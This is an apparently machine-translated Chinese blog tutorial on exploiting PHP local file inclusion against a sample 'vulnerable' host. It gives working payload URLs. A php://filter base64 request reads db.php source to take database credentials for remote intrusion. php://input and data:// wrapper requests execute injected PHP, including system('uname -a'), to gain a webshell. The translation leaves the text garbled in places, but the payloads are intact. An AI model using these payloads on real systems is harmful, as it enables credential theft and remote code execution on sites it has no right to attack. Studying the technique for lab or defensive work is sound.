Php LFI read php file source code and direct post webshell

Recently, in the intensive defcon topic training, one set of questions was mentioned in writeup written by a foreigner.LFIOther Tips

For more information, see http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/.

PS:This technique is not a new technique. It must have been used and become boring. So when you pass by, you can do it ~

I am waiting for the dishes to supplement my knowledge ~ (Squatting in the corner ~)

 

For example, in the next scenario

(1) http: // vulnerable/fileincl/example1.php? Page = intro. php (this php file contains the LFI vulnerability)

(2) but you have no place to upload your webshell code (3) LFI can only read the source code of a non-PHP file (because it cannot be parsed and executed, it can only be cracked) (4) If you can read files such as config. php, you can directly obtain the database account for remote intrusion.    [Now the question is] How does LFI read the PHP file source code?
 

So I will give you a demonstration. If I normally use LFI to read/Sqli/db. phpThe file cannot read its source code. It will be executed as a PHP file.

 
http://vulnerable/fileincl/example1.php?page=../sqli/db.php  

However, if I use the methods mentioned in a foreigner's article, we can useBase64Encoded and displayed

Http: // vulnerable/fileincl/example1.php? Page = php: // filter/read = convert. base64-encode/resource = ../sqli/db. php

/Sqli/db. phpSource codeBase64The encoded content is displayed as follows:

Then let's proceed.Base64Decoded/Sqli/db. phpThe source code of the file is at a glance

It looks amazing... but = _, = | ~ Continue to see the following content ~

 

* ****************** I am an evil splitting line*******************

 

Quilt@ Button oxBs has learned some new tips.

Tip]Php: // inputAndData:

Php: // inputFor details, refer

Http://zerofreak.blogspot.jp/2012/04/lfi-exploitation-via-phpinput-shelling.html

[Condition] In allow_url_include =OnAnd PHP> =5.2.0

[Advantage] directly POST php code and execute

[Chicken ribs] In allow_url_include =OnIn the legend, you can directlyRFIHowever, it is easier to play with kids shoes without vps.

 

In the sameLFIWe need to crack the vulnerability again.

Http: // vulnerable/fileincl/example1.php? Page = intro. php

Access the following URL and use burp to directly modify the HTTP package to append the php Command code.

1	http://vulnerable/fileincl/example1.php?page=php://input

Then a gentleman was once again killed by chrysanthemum >_< !~ (Sorry ~)

Change the positions to continueData:Method

123	http://vulnerable/fileincl/example1.php?page=data://text/plain;base64,PD9waHBpbmZvKCk7Lyo=    http://vulnerable/fileincl/example1.php?page=data:;base64,PD9waHBpbmZvKCk7Lyo=   http://vulnerable/fileincl/example1.php?page=data:text/plain,<?php system("uname -a");?>

 

Continue YY for the rest ~

Due to the time relationship, I also have time to learn more about its principles.

For the sake of Hacker spirit, we recommend that you study it in depth >_< !~